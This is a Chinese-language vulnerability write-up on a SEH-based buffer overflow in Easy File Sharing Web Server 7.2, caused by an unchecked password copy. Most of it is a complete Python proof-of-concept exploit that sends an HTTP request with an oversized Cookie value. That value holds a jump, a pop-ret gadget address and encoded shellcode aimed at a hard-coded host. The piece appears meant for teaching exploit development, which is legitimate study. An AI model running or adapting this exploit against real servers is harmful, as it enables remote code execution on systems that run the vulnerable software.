Easy File Sharing Web Server 7.2 漏洞分析及利用

1.软件简介

Easy File Sharing Web Server 是一种允许访客容易地经由浏览器上传/下载文件的文件分享系统.

2.漏洞成因

在对password进行字符串拷贝的时候,没有控制长度,导致缓冲区溢出.

3.利用过程

1.首先先向服务端发送消息,确定溢出点位置.使用winDbg跟踪发现,因为覆盖了SEH导致触发漏洞.

2.因此我们需要找到跳板指令”pop pop ret”,使用mona来查找.(尽量避免出现0x00 防止传送过程中被截断).

先找一下没有开启ASLR的模块.

这样就可以构造我们的Expolit代码了.
内存分布为:

4.PoC

代码使用python实现:

import socket, struct

host = "192.168.120.135"
port = 80

szFill = "A"*57    #61-4
szJmp = '\xeb\x08\x90\x90' #jmp 08

szAddress1 = "\x89\xa8\x01\x10"   #0x1001a889 : pop ebp # retn
szFillNop = "\x90"*3
szShellCode =  \
"\x33\xC0\xE8\xFF\xFF\xFF\xFF\xC3\x58\x8D\x70\x1B\x33\xC9\x66\xB9"\
"\x3A\x01\x8A\x04\x0E\x34\x18\x88\x04\x0E\xE2\xF6\x80\x34\x0E\x18"\
"\xFF\xE6"\
"\x78\x9B\xDC\x38\xF3\x4D\x5F\x7D\x6C\x48\x6A\x77\x7B\x59\x7C\x7C"\
"\x6A\x7D\x6B\x6B\x18\x54\x77\x79\x7C\x54\x71\x7A\x6A\x79\x6A\x61"\
"\x5D\x60\x59\x18\x6D\x6B\x7D\x6A\x2B\x2A\x36\x7C\x74\x74\x18\x55"\
"\x55\x7D\x6B\x6B\x79\x7F\x7D\x5A\x77\x60\x59\x18\x5D\x60\x71\x6C"\
"\x48\x6A\x77\x7B\x7D\x6B\x6B\x18\x50\x7D\x74\x74\x77\x38\xC9\xF6"\
"\xAB\xBC\xDE\xA5\x18\xA1\xBF\xD7\xAA\x39\x18\xF0\x18\x18\x18\x18"\
"\x43\x7C\x93\x2D\x28\x18\x18\x18\x93\x6E\x14\x93\x6E\x04\x93\x2E"\
"\x93\x4E\x10\x4B\x4A\xF0\x0C\x18\x18\x18\x93\xE8\x95\x53\xAD\x4A"\
"\x49\x4A\xE7\xC8\x42\x4B\x48\x4E\x4A\xF0\x73\x18\x18\x18\x4D\x93"\
"\xF4\x9B\xF4\x14\x4A\x93\x4D\x10\x93\x6A\x24\x95\x2C\x2A\x93\x6E"\
"\x60\x95\x2C\x0E\x93\x66\x04\x95\x24\x0F\x91\x65\xE4\x93\x66\x38"\
"\x95\x24\x0F\x91\x65\xE0\x93\x66\x3C\x95\x24\x0F\x91\x65\xEC\x2B"\
"\xD8\xF3\x19\x58\x93\x6D\xE0\x93\x2C\x9E\x95\x2C\x0E\x93\x65\x14"\
"\x95\x67\xBE\xA1\x16\x18\x18\x18\xE4\xEB\xBE\x6D\xFE\x93\x6D\xEC"\
"\x2B\xCA\x7E\x93\x0C\x5E\x93\x6D\xE4\x93\x24\x8E\x93\x4D\x10\x95"\
"\x1C\x22\x42\x93\xFD\x45\xDA\x10\x18\x4D\x93\xF4\x9B\xF4\x10\x78"\
"\x2B\xCA\x93\x5D\x08\x4A\x4A\x93\x45\x0C\x95\x6B\xDC\x4E\xE7\xC8"\
"\x95\x53\xC8\x49\x48\xE7\x4D\x14\x2B\xCA\x4A\x95\x6B\xED\x4E\x95"\
"\x6B\xF0\x4E\x4A\xE7\xC8\x95\x6B\xC4\x4E\xE7\x6D\x10\xE7\x4D\x14"\
"\xE7\xC8\x79\x93\xFD\x45\xDA\x08\x18\x18"
buffer = szFill+szJmp+szAddress1+szFillNop+szShellCode+"\x90"*1000
# HTTP GET Request
request = "GET /vfolder.ghp HTTP/1.1\r\n"
request += "Host: " + host + "\r\n"
request += "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36" + "\r\n"
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" + "\r\n"
request += "Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4" + "\r\n"
request += "Cookie: SESSIONID=3672; UserID=PassWD=" + buffer + "; frmUserName=; frmUserPass=;"
request += "\r\n"
request += "Connection: keep-alive" + "\r\n"
request += "If-Modified-Since: Thu, 06 Jul 2017 14:12:13 GMT" + "\r\n"

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

connect=s.connect((host, port))

s.send(request + "\r\n\r\n")
s.close()

5.结语

对于有ASLR保护的程序,我们可以通过其他为开启ASLR保护的模块来绕过ASLR保护.